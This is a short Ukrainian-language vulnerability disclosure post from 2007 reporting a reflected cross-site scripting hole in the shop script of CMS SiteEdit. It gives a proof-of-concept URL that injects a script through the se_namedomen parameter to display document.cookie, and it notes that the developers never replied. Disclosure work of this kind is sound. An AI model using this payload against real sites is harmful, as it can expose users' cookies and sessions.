XSS уразливість в CMS SiteEdit

19:35 13.10.2007

31.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість в CMS SiteEdit. Як раз коли виявив уразливість на www.siteedit.ru, де і використовується цей движок.

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам системи.

13.10.2007

XSS:

Уразливість в скрипті shop движка в параметрі se_namedomen.

http://site/shop?se_namedomen=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Розробникам CMS SiteEdit я повідомив, але вони так і не відповіли. Тому користувачам даної CMS варто самотужки виправити цю дірку.


Leave a Reply

You must be logged in to post a comment.